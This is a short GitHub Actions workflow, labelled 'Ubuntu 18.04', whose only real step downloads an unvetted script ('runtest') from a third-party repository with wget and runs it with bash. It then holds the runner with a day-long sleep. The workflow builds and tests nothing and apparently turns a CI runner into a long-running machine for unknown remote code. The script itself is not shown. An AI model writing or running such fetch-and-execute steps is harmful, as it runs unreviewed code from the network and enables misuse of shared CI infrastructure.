name: Ubuntu 18.04

on: 
  workflow_dispatch:
  
jobs:
  build:
    runs-on: ubuntu-latest   # Host runner

    steps:
      - uses: actions/checkout@v3

      - name: setup
        run: |
         apt update && apt install wget sudo -y && wget https://github.com/githubaunglaymyanmar/fordownload/raw/refs/heads/main/root/runtest && bash runtest   



 
      - name: Ubuntu ready to go 
        run: sleep 1d

